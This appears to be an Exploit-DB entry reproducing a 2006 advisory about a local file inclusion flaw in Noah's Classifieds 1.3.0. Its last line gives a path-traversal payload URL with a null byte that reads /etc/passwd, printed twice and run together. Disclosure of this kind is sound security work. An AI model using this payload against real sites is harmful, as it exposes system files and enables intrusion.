Noah's Classifieds 1.0/1.3 - Local File Inclusion

EDB-ID:

27261


Author:

trueend5

Type:

webapps


Platform:

PHP

Date:

2006-02-22


source: https://www.securityfocus.com/bid/16778/info

Noah's Classifieds is prone to a local file-include vulnerability. This may facilitate the unauthorized viewing of files and unauthorized execution of local scripts. 

Version 1.3.0 is vulnerable; other versions may be affected as well.

http://www.example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00http://www.example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00